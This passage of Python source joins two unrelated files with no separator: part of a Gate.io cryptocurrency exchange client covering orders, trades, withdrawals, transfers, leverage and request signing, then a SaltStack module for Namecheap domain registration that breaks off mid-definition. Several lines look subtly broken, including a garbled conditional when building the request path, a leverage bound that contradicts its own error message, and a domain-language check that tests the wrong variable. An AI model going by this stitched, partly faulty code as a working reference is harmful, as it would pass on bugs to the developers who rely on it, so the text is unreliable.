price = self.safe_string(params, 'price') request = self.prepare_request(market) request['interval'] = self.timeframes[timeframe] method = 'publicSpotGetCandlesticks' if market['contract']: if market['futures']: method = 'publicDeliveryGetSettleCandlesticks' elif market['swap']: method = 'publicFuturesGetSettleCandlesticks' isMark = (price == 'mark') isIndex = (price == 'index') if isMark or isIndex: request['contract'] = price + '_' + market['id'] params = self.omit(params, 'price') if since is None: if limit is not None: request['limit'] = limit else: request['from'] = int(since / 1000) if limit is not None: request['to'] = self.sum(request['from'], limit * self.parse_timeframe(timeframe) - 1) response = getattr(self, method)(self.extend(request, params)) return self.parse_ohlcvs(response, market, timeframe, since, limit) def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}): request = { 'price': 'mark', } return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params)) def fetch_funding_rate_history(self, symbol=None, limit=None, since=None, params={}): self.load_markets() if symbol is None: raise ArgumentsRequired(self.id + ' fetchFundingRateHistory() requires a symbol argument') market = self.market(symbol) request = { 'contract': market['id'], 'settle': market['quote'].lower(), } if limit is not None: request['limit'] = limit method = 'publicFuturesGetSettleFundingRate' response = getattr(self, method)(self.extend(request, params)) # # { # "r": "0.00063521", # "t": "1621267200000", # } # rates = [] for i in range(0, len(response)): entry = response[i] timestamp = self.safe_timestamp(entry, 't') rates.append({ 'info': entry, 'symbol': symbol, 'fundingRate': self.safe_number(entry, 'r'), 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), }) return self.sort_by(rates, 'timestamp') def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}): request = { 'price': 'index', } return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params)) def parse_ohlcv(self, ohlcv, market=None): # # Spot market candles # # [ # "1626163200", # Unix timestamp in seconds # "346711.933138181617", # Trading volume # "33165.23", # Close price # "33260", # Highest price # "33117.6", # Lowest price # "33184.47" # Open price # ] # # Mark and Index price candles # # { # "t":1632873600, # Unix timestamp in seconds # "o": "41025", # Open price # "h": "41882.17", # Highest price # "c": "41776.92", # Close price # "l": "40783.94" # Lowest price # } # if isinstance(ohlcv, list): return [ self.safe_timestamp(ohlcv, 0), # unix timestamp in seconds self.safe_number(ohlcv, 5), # open price self.safe_number(ohlcv, 3), # highest price self.safe_number(ohlcv, 4), # lowest price self.safe_number(ohlcv, 2), # close price self.safe_number(ohlcv, 1), # trading volume ] else: # Mark and Index price candles return [ self.safe_timestamp(ohlcv, 't'), # unix timestamp in seconds self.safe_number(ohlcv, 'o'), # open price self.safe_number(ohlcv, 'h'), # highest price self.safe_number(ohlcv, 'l'), # lowest price self.safe_number(ohlcv, 'c'), # close price self.safe_number(ohlcv, 'v'), # trading volume, None for mark or index price ] def fetch_trades(self, symbol, since=None, limit=None, params={}): self.load_markets() market = self.market(symbol) # # spot # # request = { # 'currency_pair': market['id'], # 'limit': limit, # maximum number of records to be returned in a single list # 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results # 'reverse': False, # True to retrieve records where id is smaller than the specified last_id, False to retrieve records where id is larger than the specified last_id # } # # swap, futures # # request = { # 'settle': market['settleId'], # 'contract': market['id'], # 'limit': limit, # maximum number of records to be returned in a single list # 'last_id': 'id', # specify list staring point using the id of last record in previous list-query results # 'from': since / 1000), # starting time in seconds, if not specified, to and limit will be used to limit response items # 'to': self.seconds(), # end time in seconds, default to current time # } # request = self.prepare_request(market) method = self.get_supported_mapping(market['type'], { 'spot': 'publicSpotGetTrades', # 'margin': 'publicMarginGetTickers', 'swap': 'publicFuturesGetSettleTrades', 'futures': 'publicDeliveryGetSettleTrades', }) if limit is not None: request['limit'] = limit # default 100, max 1000 if since is not None and (market['contract']): request['from'] = int(since / 1000) response = getattr(self, method)(self.extend(request, params)) # # spot # # [ # { # id: "1852958144", # create_time: "1634673259", # create_time_ms: "1634673259378.105000", # currency_pair: "ADA_USDT", # side: "sell", # amount: "307.078", # price: "2.104", # } # ] # # perpetual swap # # [ # { # size: "2", # id: "2522911", # create_time_ms: "1634673380.182", # create_time: "1634673380.182", # contract: "ADA_USDT", # price: "2.10486", # } # ] # return self.parse_trades(response, market, since, limit) def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}): self.load_markets() market = self.market(symbol) # # request = { # 'currency_pair': market['id'], # # 'limit': limit, # # 'page': 0, # # 'order_id': 'Order ID', # # 'account': 'spot', # default to spot and margin account if not specified, set to cross_margin to operate against margin account # # 'from': since, # default to 7 days before current time # # 'to': self.milliseconds(), # default to current time # } # request = self.prepare_request(market) if limit is not None: request['limit'] = limit # default 100, max 1000 if since is not None: request['from'] = int(since / 1000) # request['to'] = since + 7 * 24 * 60 * 60 method = self.get_supported_mapping(market['type'], { 'spot': 'privateSpotGetMyTrades', # 'margin': 'publicMarginGetCurrencyPairs', 'swap': 'privateFuturesGetSettleMyTrades', 'futures': 'privateDeliveryGetSettleMyTrades', }) response = getattr(self, method)(self.extend(request, params)) # SPOT # [{ # id: "1851927191", # create_time: "1634333360", # create_time_ms: "1634333360359.901000", # currency_pair: "BTC_USDT", # side: "buy", # role: "taker", # amount: "0.0001", # price: "62547.51", # order_id: "93475897349", # fee: "2e-07", # fee_currency: "BTC", # point_fee: "0", # gt_fee: "0", # }] # Perpetual Swap # [{ # size: "-13", # order_id: "79723658958", # id: "47612669", # role: "taker", # create_time: "1634600263.326", # contract: "BTC_USDT", # price: "61987.8", # }] return self.parse_trades(response, market, since, limit) def parse_trade(self, trade, market=None): # # public # # { # "id": "1334253759", # "create_time": "1626342738", # "create_time_ms": "1626342738331.497000", # "currency_pair": "BTC_USDT", # "side": "sell", # "amount": "0.0022", # "price": "32452.16" # } # # private # # { # "id": "218087755", # "create_time": "1578958740", # "create_time_ms": "1578958740122.710000", # "currency_pair": "BTC_USDT", # "side": "sell", # "role": "taker", # "amount": "0.0004", # "price": "8112.77", # "order_id": "8445563839", # "fee": "0.006490216", # "fee_currency": "USDT", # "point_fee": "0", # "gt_fee": "0" # } # id = self.safe_string(trade, 'id') timestampStringContract = self.safe_string(trade, 'create_time') timestampString = self.safe_string_2(trade, 'create_time_ms', 'time', timestampStringContract) timestamp = None if timestampString.find('.') > 0: milliseconds = timestampString.split('.') timestamp = int(milliseconds[0]) if market['contract']: timestamp = timestamp * 1000 marketId = self.safe_string_2(trade, 'currency_pair', 'contract') symbol = self.safe_symbol(marketId, market) amountString = self.safe_string_2(trade, 'amount', 'size') priceString = self.safe_string(trade, 'price') costString = Precise.string_abs(Precise.string_mul(amountString, priceString)) price = self.parse_number(priceString) cost = self.parse_number(costString) contractSide = 'sell' if Precise.string_lt(amountString, '0') else 'buy' amountString = Precise.string_abs(amountString) amount = self.parse_number(amountString) side = self.safe_string(trade, 'side', contractSide) orderId = self.safe_string(trade, 'order_id') gtFee = self.safe_string(trade, 'gt_fee') feeCurrency = None feeCost = None if gtFee == '0': feeCurrency = self.safe_string(trade, 'fee_currency') feeCost = self.safe_number(trade, 'fee') else: feeCurrency = 'GT' feeCost = self.parse_number(gtFee) fee = { 'cost': feeCost, 'currency': feeCurrency, } takerOrMaker = self.safe_string(trade, 'role') return { 'info': trade, 'id': id, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'symbol': symbol, 'order': orderId, 'type': None, 'side': side, 'takerOrMaker': takerOrMaker, 'price': price, 'amount': amount, 'cost': cost, 'fee': fee, } def fetch_deposits(self, code=None, since=None, limit=None, params={}): self.load_markets() request = {} currency = None if code is not None: currency = self.currency(code) request['currency'] = currency['id'] if limit is not None: request['limit'] = limit if since is not None: request['from'] = int(since / 1000) request['to'] = since + 30 * 24 * 60 * 60 response = self.privateWalletGetDeposits(self.extend(request, params)) return self.parse_transactions(response, currency) def fetch_withdrawals(self, code=None, since=None, limit=None, params={}): self.load_markets() request = {} currency = None if code is not None: currency = self.currency(code) request['currency'] = currency['id'] if limit is not None: request['limit'] = limit if since is not None: request['from'] = int(since / 1000) request['to'] = since + 30 * 24 * 60 * 60 response = self.privateWalletGetWithdrawals(self.extend(request, params)) return self.parse_transactions(response, currency) def withdraw(self, code, amount, address, tag=None, params={}): tag, params = self.handle_withdraw_tag_and_params(tag, params) self.check_address(address) self.load_markets() currency = self.currency(code) request = { 'currency': currency['id'], 'address': address, 'amount': self.currency_to_precision(code, amount), } if tag is not None: request['memo'] = tag networks = self.safe_value(self.options, 'networks', {}) network = self.safe_string_upper(params, 'network') # self line allows the user to specify either ERC20 or ETH network = self.safe_string_lower(networks, network, network) # handle ETH>ERC20 alias if network is not None: request['chain'] = network params = self.omit(params, 'network') response = self.privateWithdrawalsPost(self.extend(request, params)) # # { # "id": "w13389675", # "currency": "USDT", # "amount": "50", # "address": "TUu2rLFrmzUodiWfYki7QCNtv1akL682p1", # "memo": null # } # currencyId = self.safe_string(response, 'currency') id = self.safe_string(response, 'id') return { 'info': response, 'id': id, 'code': self.safe_currency_code(currencyId), 'amount': self.safe_number(response, 'amount'), 'address': self.safe_string(response, 'address'), 'tag': self.safe_string(response, 'memo'), } def parse_transaction_status(self, status): statuses = { 'PEND': 'pending', 'REQUEST': 'pending', 'DMOVE': 'pending', 'CANCEL': 'failed', 'DONE': 'ok', } return self.safe_string(statuses, status, status) def parse_transaction_type(self, type): types = { 'd': 'deposit', 'w': 'withdrawal', } return self.safe_string(types, type, type) def parse_transaction(self, transaction, currency=None): # # deposits # # { # "id": "d33361395", # "currency": "USDT_TRX", # "address": "TErdnxenuLtXfnMafLbfappYdHtnXQ5U4z", # "amount": "100", # "txid": "ae9374de34e558562fe18cbb1bf9ab4d9eb8aa7669d65541c9fa2a532c1474a0", # "timestamp": "1626345819", # "status": "DONE", # "memo": "" # } # # withdrawals id = self.safe_string(transaction, 'id') type = None if id is not None: type = self.parse_transaction_type(id[0]) currencyId = self.safe_string(transaction, 'currency') code = self.safe_currency_code(currencyId) amount = self.safe_number(transaction, 'amount') txid = self.safe_string(transaction, 'txid') rawStatus = self.safe_string(transaction, 'status') status = self.parse_transaction_status(rawStatus) address = self.safe_string(transaction, 'address') fee = self.safe_number(transaction, 'fee') tag = self.safe_string(transaction, 'memo') if tag == '': tag = None timestamp = self.safe_timestamp(transaction, 'timestamp') return { 'info': transaction, 'id': id, 'txid': txid, 'currency': code, 'amount': amount, 'address': address, 'tag': tag, 'status': status, 'type': type, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'fee': fee, } def create_order(self, symbol, type, side, amount, price=None, params={}): # # :param(str) symbol: base/quote currency pair # :param(str) type: Order type(limit, market, ...) # :param(str) side: buy or sell # :param(number) amount: Amount of base currency ordered # :param(number) price: Price of the base currency using quote currency # :param(dict) params: # - type: market type(spot, futures, ...) # - reduceOnly self.load_markets() market = self.market(symbol) defaultType = self.safe_string_2(self.options, 'createOrder', 'defaultType', 'spot') marketType = self.safe_string(params, 'type', defaultType) contract = market['contract'] request = self.prepare_request(market) reduceOnly = self.safe_value(params, 'reduceOnly') params = self.omit(params, 'reduceOnly') if reduceOnly is not None: if not contract: raise InvalidOrder(self.id + ' createOrder() does not support reduceOnly for ' + marketType + ' orders, reduceOnly orders are supported for futures and perpetuals only') request['reduce_only'] = reduceOnly if contract: if side == 'sell': amount = 0 - amount request['size'] = self.parse_number(self.amount_to_precision(symbol, amount)) else: request['side'] = side request['type'] = type request['amount'] = self.amount_to_precision(symbol, amount) request['account'] = marketType # if margin: # if entering trade: # request['auto_borrow'] = True # elif exiting trade: # request['auto_repay'] = True # } # } if type == 'limit': if not price: raise ArgumentsRequired('Argument price is required for ' + self.id + '.createOrder for limit orders') request['price'] = self.price_to_precision(symbol, price) elif (type == 'market') and contract: request['tif'] = 'ioc' request['price'] = 0 method = self.get_supported_mapping(market['type'], { 'spot': 'privateSpotPostOrders', # 'margin': 'privateSpotPostOrders', 'swap': 'privateFuturesPostSettleOrders', 'future': 'privateDeliveryPostSettleOrders', }) response = getattr(self, method)(self.extend(request, params)) return self.parse_order(response, market) def parse_order_status(self, status): statuses = { 'filled': 'closed', 'cancelled': 'canceled', 'liquidated': 'closed', } return self.safe_string(statuses, status, status) def parse_order(self, order, market=None): # # createOrder, spot # # { # "id": "62364648575", # "text": "apiv4", # "create_time": "1626354834", # "update_time": "1626354834", # "create_time_ms": "1626354833544", # "update_time_ms": "1626354833544", # "status": "open", # "currency_pair": "BTC_USDT", # "type": "limit", # "account": "spot", # "side": "buy", # "amount": "0.0001", # "price": "30000", # "time_in_force": "gtc", # "iceberg": "0", # "left": "0.0001", # "fill_price": "0", # "filled_total": "0", # "fee": "0", # "fee_currency": "BTC", # "point_fee": "0", # "gt_fee": "0", # "gt_discount": True, # "rebated_fee": "0", # "rebated_fee_currency": "USDT" # } # # id = self.safe_string(order, 'id') marketId = self.safe_string_2(order, 'currency_pair', 'contract') symbol = self.safe_symbol(marketId, market) timestamp = self.safe_timestamp(order, 'create_time') timestamp = self.safe_integer(order, 'create_time_ms', timestamp) lastTradeTimestamp = self.safe_timestamp(order, 'update_time') lastTradeTimestamp = self.safe_integer(order, 'update_time_ms', lastTradeTimestamp) amountRaw = self.safe_string_2(order, 'amount', 'size') amount = Precise.string_abs(amountRaw) price = self.safe_string(order, 'price') average = self.safe_string(order, 'fill_price') remaining = self.safe_string(order, 'left') cost = self.safe_string(order, 'filled_total') # same as filled_price rawStatus = None side = None contract = self.safe_value(market, 'contract') if contract: side = 'buy' if Precise.string_gt(amountRaw, '0') else 'sell' rawStatus = self.safe_string(order, 'finish_as', 'open') else: # open, closed, cancelled - almost already ccxt unified! rawStatus = self.safe_string(order, 'status') side = self.safe_string(order, 'side') status = self.parse_order_status(rawStatus) type = self.safe_string(order, 'type') timeInForce = self.safe_string_upper_2(order, 'time_in_force', 'tif') fees = [] gtFee = self.safe_number(order, 'gt_fee') if gtFee: fees.append({ 'currency': 'GT', 'cost': gtFee, }) fee = self.safe_number(order, 'fee') if fee: fees.append({ 'currency': self.safe_currency_code(self.safe_string(order, 'fee_currency')), 'cost': fee, }) rebate = self.safe_string(order, 'rebated_fee') if rebate: fees.append({ 'currency': self.safe_currency_code(self.safe_string(order, 'rebated_fee_currency')), 'cost': self.parse_number(Precise.string_neg(rebate)), }) mkfr = self.safe_number(order, 'mkfr') tkfr = self.safe_number(order, 'tkfr') if mkfr: fees.append({ 'currency': self.safe_currency_code(self.safe_string(order, 'settleId')), 'cost': mkfr, }) if tkfr: fees.append({ 'currency': self.safe_currency_code(self.safe_string(market, 'settleId')), 'cost': tkfr, }) return self.safe_order2({ 'id': id, 'clientOrderId': id, 'timestamp': timestamp, 'datetime': self.iso8601(timestamp), 'lastTradeTimestamp': lastTradeTimestamp, 'status': status, 'symbol': symbol, 'type': type, 'timeInForce': timeInForce, 'postOnly': None, 'side': side, 'price': price, 'stopPrice': None, 'average': average, 'amount': amount, 'cost': cost, 'filled': None, 'remaining': remaining, 'fee': None, 'fees': fees, 'trades': None, 'info': order, }, market) def fetch_order(self, id, symbol=None, params={}): if symbol is None: raise ArgumentsRequired(self.id + ' fetchOrder() requires a symbol argument') self.load_markets() market = self.market(symbol) request = { 'order_id': id, } if market['spot'] or market['margin']: request['currency_pair'] = market['id'] else: request['settle'] = market['settleId'] method = self.get_supported_mapping(market['type'], { 'spot': 'privateSpotGetOrdersOrderId', # 'margin': 'publicMarginGetTickers', 'swap': 'privateFuturesGetSettleOrdersOrderId', 'futures': 'privateDeliveryGetSettlePriceOrdersOrderId', }) response = getattr(self, method)(self.extend(request, params)) return self.parse_order(response, market) def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}): self.load_markets() defaultType = self.safe_string_2(self.options, 'fetchMarkets', 'defaultType', 'spot') type = self.safe_string(params, 'type', defaultType) if symbol is None and (type == 'spot') or type == 'margin' or type == 'cross_margin': request = { # 'page': 1, # 'limit': limit, 'account': type, # spot/margin(default), cross_margin } if limit is not None: request['limit'] = limit response = self.privateSpotGetOpenOrders(self.extend(request, params)) # # [ # { # "currency_pair": "ETH_BTC", # "total": 1, # "orders": [ # { # "id": "12332324", # "text": "t-123456", # "create_time": "1548000000", # "update_time": "1548000100", # "currency_pair": "ETH_BTC", # "status": "open", # "type": "limit", # "account": "spot", # "side": "buy", # "amount": "1", # "price": "5.00032", # "time_in_force": "gtc", # "left": "0.5", # "filled_total": "2.50016", # "fee": "0.005", # "fee_currency": "ETH", # "point_fee": "0", # "gt_fee": "0", # "gt_discount": False, # "rebated_fee": "0", # "rebated_fee_currency": "BTC" # } # ] # }, # ... # ] # allOrders = [] for i in range(0, len(response)): entry = response[i] orders = self.safe_value(entry, 'orders', []) parsed = self.parse_orders(orders, None, since, limit) allOrders = self.array_concat(allOrders, parsed) return self.filter_by_since_limit(allOrders, since, limit) return self.fetch_orders_by_status('open', symbol, since, limit, params) def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}): return self.fetch_orders_by_status('finished', symbol, since, limit, params) def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}): self.load_markets() if symbol is None: raise ArgumentsRequired(self.id + ' fetchOrdersByStatus requires a symbol argument') market = self.market(symbol) request = self.prepare_request(market) request['status'] = status if limit is not None: request['limit'] = limit if since is not None and (market['spot'] or market['margin']): request['start'] = int(since / 1000) method = self.get_supported_mapping(market['type'], { 'spot': 'privateSpotGetOrders', 'margin': 'privateSpotGetOrders', 'swap': 'privateFuturesGetSettleOrders', 'futures': 'privateDeliveryGetSettleOrders', }) if market['type'] == 'margin' or market['type'] == 'cross_margin': request['account'] = market['type'] response = getattr(self, method)(self.extend(request, params)) # SPOT # { # "id":"8834234273", # "text": "3", # "create_time": "1635406193", # "update_time": "1635406193", # "create_time_ms": 1635406193361, # "update_time_ms": 1635406193361, # "status": "closed", # "currency_pair": "BTC_USDT", # "type": "limit", # "account": "spot", # "side": "sell", # "amount": "0.0002", # "price": "58904.01", # "time_in_force":"gtc", # "iceberg": "0", # "left": "0.0000", # "fill_price": "11.790516", # "filled_total": "11.790516", # "fee": "0.023581032", # "fee_currency": "USDT", # "point_fee": "0", # "gt_fee": "0", # "gt_discount": False, # "rebated_fee_currency": "BTC" # } # Perpetual Swap # { # "status": "finished", # "size":-1, # "left":0, # "id":82750739203, # "is_liq":false, # "is_close":false, # "contract": "BTC_USDT", # "text": "web", # "fill_price": "60721.3", # "finish_as": "filled", # "iceberg":0, # "tif": "ioc", # "is_reduce_only":true, # "create_time": 1635403475.412, # "finish_time": 1635403475.4127, # "price": "0" # } return self.parse_orders(response, market, since, limit) def cancel_order(self, id, symbol=None, params={}): self.load_markets() if symbol is None: raise ArgumentsRequired(self.id + ' cancelOrders requires a symbol parameter') market = self.market(symbol) request = { 'order_id': id, } if market['contract']: request['settle'] = market['settleId'] else: request['currency_pair'] = market['id'] method = self.get_supported_mapping(market['type'], { 'spot': 'privateSpotDeleteOrdersOrderId', 'margin': 'privateSpotDeleteOrdersOrderId', 'swap': 'privateFuturesDeleteSettleOrdersOrderId', 'futures': 'privateDeliveryDeleteSettleOrdersOrderId', }) response = getattr(self, method)(self.extend(request, params)) # Perpetual swap # { # id: "82241928192", # contract: "BTC_USDT", # mkfr: "0", # tkfr: "0.0005", # tif: "gtc", # is_reduce_only: False, # create_time: "1635196145.06", # finish_time: "1635196233.396", # price: "61000", # size: "4", # refr: "0", # left: "4", # text: "web", # fill_price: "0", # user: "6693577", # finish_as: "cancelled", # status: "finished", # is_liq: False, # refu: "0", # is_close: False, # iceberg: "0", # } return self.parse_order(response, market) def transfer(self, code, amount, fromAccount, toAccount, params={}): self.load_markets() currency = self.currency(code) accountsByType = self.safe_value(self.options, 'accountsByType', {}) fromId = self.safe_string(accountsByType, fromAccount, fromAccount) toId = self.safe_string(accountsByType, toAccount, toAccount) if fromId is None: keys = list(accountsByType.keys()) raise ExchangeError(self.id + ' fromAccount must be one of ' + ', '.join(keys)) if toId is None: keys = list(accountsByType.keys()) raise ExchangeError(self.id + ' toAccount must be one of ' + ', '.join(keys)) truncated = self.currency_to_precision(code, amount) request = { 'currency': currency['id'], 'from': fromId, 'to': toId, 'amount': truncated, } if (toId == 'futures') or (toId == 'delivery'): request['settle'] = currency['id'] response = self.privateWalletPostTransfers(self.extend(request, params)) # # according to the docs # # { # "currency": "BTC", # "from": "spot", # "to": "margin", # "amount": "1", # "currency_pair": "BTC_USDT" # } # # actual response # # POST https://api.gateio.ws/api/v4/wallet/transfers 204 No Content # return { 'info': response, 'from': fromId, 'to': toId, 'amount': truncated, 'code': code, } def set_leverage(self, leverage, symbol=None, params={}): if symbol is None: raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument') # WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS # AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS if (leverage < 0) or (leverage > 100): raise BadRequest(self.id + ' leverage should be between 1 and 100') self.load_markets() market = self.market(symbol) method = self.get_supported_mapping(market['type'], { 'swap': 'privateFuturesPostSettlePositionsContractLeverage', 'futures': 'privateDeliveryPostSettlePositionsContractLeverage', }) request = self.prepare_request(market) request['query'] = { 'leverage': str(leverage), } if 'cross_leverage_limit' in params: if leverage != 0: raise BadRequest(self.id + ' cross margin leverage(valid only when leverage is 0)') request['cross_leverage_limit'] = str(params['cross_leverage_limit']) params = self.omit(params, 'cross_leverage_limit') response = getattr(self, method)(self.extend(request, params)) # # { # "value":"0", # "leverage":"5", # "mode":"single", # "realised_point":"0", # "contract":"BTC_USDT", # "entry_price":"0", # "mark_price":"62035.86", # "history_point":"0", # "realised_pnl":"0", # "close_order":null, # "size":0, # "cross_leverage_limit":"0", # "pending_orders":0, # "adl_ranking":6, # "maintenance_rate":"0.005", # "unrealised_pnl":"0", # "user":2436035, # "leverage_max":"100", # "history_pnl":"0", # "risk_limit":"1000000", # "margin":"0", # "last_close_pnl":"0", # "liq_price":"0" # } # return response def sign(self, path, api=[], method='GET', params={}, headers=None, body=None): authentication = api[0] # public, private type = api[1] # spot, margin, futures, delivery query = self.omit(params, self.extract_params(path)) path = self.implode_params(path, params) endPart = (path == '' if '' else '/' + path) entirePath = '/' + type + endPart url = self.urls['api'][authentication] + entirePath if authentication == 'public': if query: url += '?' + self.urlencode(query) else: queryString = '' if (method == 'GET') or (method == 'DELETE'): if query: queryString = self.urlencode(query) url += '?' + queryString else: urlQueryParams = self.safe_value(query, 'query', {}) if urlQueryParams: queryString = self.urlencode(urlQueryParams) url += '?' + queryString query = self.omit(query, 'query') body = self.json(query) bodyPayload = '' if (body is None) else body bodySignature = self.hash(self.encode(bodyPayload), 'sha512') timestamp = self.seconds() timestampString = str(timestamp) signaturePath = '/api/' + self.version + entirePath payloadArray = [method.upper(), signaturePath, queryString, bodySignature, timestampString] # eslint-disable-next-line quotes payload = "\n".join(payloadArray) signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha512) headers = { 'KEY': self.apiKey, 'Timestamp': timestampString, 'SIGN': signature, 'Content-Type': 'application/json', } return {'url': url, 'method': method, 'body': body, 'headers': headers} def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody): label = self.safe_string(response, 'label') if label is not None: message = self.safe_string_2(response, 'message', 'detail', '') Error = self.safe_value(self.exceptions, label, ExchangeError) raise Error(self.id + ' ' + message)
# -*- coding: utf-8 -*- ''' Namecheap domains management .. versionadded:: 2017.7.0 General Notes ------------- Use this module to manage domains through the namecheap api. The Namecheap settings will be set in grains. Installation Prerequisites -------------------------- - This module uses the following python libraries to communicate to the namecheap API: * ``requests`` .. code-block:: bash pip install requests - As saltstack depends on ``requests`` this shouldn't be a problem Prerequisite Configuration -------------------------- - The namecheap username, api key and url should be set in a minion configuration file or pillar .. code-block:: yaml namecheap.name: companyname namecheap.key: a1b2c3d4e5f67a8b9c0d1e2f3 namecheap.client_ip: #Real url namecheap.url: https://api.namecheap.com/xml.response #Sandbox url #namecheap.url: https://api.sandbox.namecheap.xml.response ''' from __future__ import absolute_import, print_function, unicode_literals CAN_USE_NAMECHEAP = True try: import salt.utils.namecheap except ImportError: CAN_USE_NAMECHEAP = False # Import 3rd-party libs from salt.ext import six def __virtual__(): ''' Check to make sure requests and xml are installed and requests ''' if CAN_USE_NAMECHEAP: return 'namecheap_domains' return False def reactivate(domain_name): ''' Try to reactivate the expired domain name returns the following information in a dictionary issuccess bool indicates whether the domain was renewed successfully amount charged for reactivation orderid unique integer value for the order transactionid unique integer value for the transaction CLI Example: .. code-block:: bash salt 'my-minion' namecheap_domains.reactivate my-domain-name ''' opts = salt.utils.namecheap.get_opts('namecheap.domains.reactivate') opts['DomainName'] = domain_name response_xml = salt.utils.namecheap.post_request(opts) if response_xml is None: return {} domainreactivateresult = response_xml.getElementsByTagName('DomainReactivateResult')[0] return salt.utils.namecheap.xml_to_dict(domainreactivateresult) def renew(domain_name, years, promotion_code=None): ''' Try to renew the specified expiring domain name for a specified number of years returns the following information in a dictionary renew bool indicates whether the domain was renewed successfully domainid unique integer value for the domain orderid unique integer value for the order transactionid unique integer value for the transaction amount charged for renewal Required parameters: domain_name string The domain name you wish to renew CLI Example: .. code-block:: bash salt 'my-minion' namecheap_domains.renew my-domain-name 5 ''' opts = salt.utils.namecheap.get_opts('namecheap.domains.renew') opts['DomainName'] = domain_name opts['Years'] = years if promotion_code is not None: opts['PromotionCode'] = promotion_code response_xml = salt.utils.namecheap.post_request(opts) if response_xml is None: return {} domainrenewresult = response_xml.getElementsByTagName("DomainRenewResult")[0] return salt.utils.namecheap.xml_to_dict(domainrenewresult) def create(domain_name, years, **kwargs): ''' Try to create the specified domain name for the specified number of years returns the following information in a dictionary registered True/False amount charged for registration domainid unique integer value for the domain orderid unique integer value for the order transactionid unique integer value for the transaction whoisguardenable True,False if enabled for this domain nonrealtimedomain True,False if domain registration is instant or not CLI Example: .. code-block:: bash salt 'my-minion' namecheap_domains.create my-domain-name 2 ''' idn_codes = set(['afr', 'alb', 'ara', 'arg', 'arm', 'asm', 'ast', 'ave', 'awa', 'aze', 'bak', 'bal', 'ban', 'baq', 'bas', 'bel', 'ben', 'bho', 'bos', 'bul', 'bur', 'car', 'cat', 'che', 'chi', 'chv', 'cop', 'cos', 'cze', 'dan', 'div', 'doi', 'dut', 'eng', 'est', 'fao', 'fij', 'fin', 'fre', 'fry', 'geo', 'ger', 'gla', 'gle', 'gon', 'gre', 'guj', 'heb', 'hin', 'hun', 'inc', 'ind', 'inh', 'isl', 'ita', 'jav', 'jpn', 'kas', 'kaz', 'khm', 'kir', 'kor', 'kur', 'lao', 'lav', 'lit', 'ltz', 'mal', 'mkd', 'mlt', 'mol', 'mon', 'mri', 'msa', 'nep', 'nor', 'ori', 'oss', 'pan', 'per', 'pol', 'por', 'pus', 'raj', 'rum', 'rus', 'san', 'scr', 'sin', 'slo', 'slv', 'smo', 'snd', 'som', 'spa', 'srd', 'srp', 'swa', 'swe', 'syr', 'tam', 'tel', 'tgk', 'tha', 'tib', 'tur', 'ukr', 'urd', 'uzb', 'vie', 'wel', 'yid']) require_opts = ['AdminAddress1', 'AdminCity', 'AdminCountry', 'AdminEmailAddress', 'AdminFirstName', 'AdminLastName', 'AdminPhone', 'AdminPostalCode', 'AdminStateProvince', 'AuxBillingAddress1', 'AuxBillingCity', 'AuxBillingCountry', 'AuxBillingEmailAddress', 'AuxBillingFirstName', 'AuxBillingLastName', 'AuxBillingPhone', 'AuxBillingPostalCode', 'AuxBillingStateProvince', 'RegistrantAddress1', 'RegistrantCity', 'RegistrantCountry', 'RegistrantEmailAddress', 'RegistrantFirstName', 'RegistrantLastName', 'RegistrantPhone', 'RegistrantPostalCode', 'RegistrantStateProvince', 'TechAddress1', 'TechCity', 'TechCountry', 'TechEmailAddress', 'TechFirstName', 'TechLastName', 'TechPhone', 'TechPostalCode', 'TechStateProvince', 'Years'] opts = salt.utils.namecheap.get_opts('namecheap.domains.create') opts['DomainName'] = domain_name opts['Years'] = six.text_type(years) def add_to_opts(opts_dict, kwargs, value, suffix, prefices): for prefix in prefices: nextkey = prefix + suffix if nextkey not in kwargs: opts_dict[nextkey] = value for key, value in six.iteritems(kwargs): if key.startswith('Registrant'): add_to_opts(opts, kwargs, value, key[10:], ['Tech', 'Admin', 'AuxBilling', 'Billing']) if key.startswith('Tech'): add_to_opts(opts, kwargs, value, key[4:], ['Registrant', 'Admin', 'AuxBilling', 'Billing']) if key.startswith('Admin'): add_to_opts(opts, kwargs, value, key[5:], ['Registrant', 'Tech', 'AuxBilling', 'Billing']) if key.startswith('AuxBilling'): add_to_opts(opts, kwargs, value, key[10:], ['Registrant', 'Tech', 'Admin', 'Billing']) if key.startswith('Billing'): add_to_opts(opts, kwargs, value, key[7:], ['Registrant', 'Tech', 'Admin', 'AuxBilling']) if key == 'IdnCode' and key not in idn_codes: salt.utils.namecheap.log.error('Invalid IdnCode') raise Exception('Invalid IdnCode') opts[key] = value for requiredkey in require_opts: if requiredkey not in opts: salt.utils.namecheap.log.error("Missing required parameter '" + requiredkey + "'") raise Exception("Missing required parameter '" + requiredkey + "'") response_xml = salt.utils.namecheap.post_request(opts) if response_xml is None: return {} domainresult = response_xml.getElementsByTagName("DomainCreateResult")[0] return salt.utils.namecheap.atts_to_dict(domainresult) def check(*domains_to_check): ''' Checks the availability of domains returns a dictionary where the domain name is the key and the availability is the value of True/False domains_to_check array of strings List of domains to check CLI Example: .. code-block:: bash salt 'my-minion' namecheap_domains.check domain-to-check ''' opts = salt.utils.namecheap.get_opts('namecheap.domains.check') opts['DomainList'] = ','.join(domains_to_check) response_xml = salt.utils.namecheap.get_request(opts) if response_xml is None: return {} domains_checked = {} for result in response_xml.getElementsByTagName("DomainCheckResult"): available = result.getAttribute("Available") domains_checked[result.getAttribute("Domain").lower()] = salt.utils.namecheap.string_to_value(available) return domains_checked def 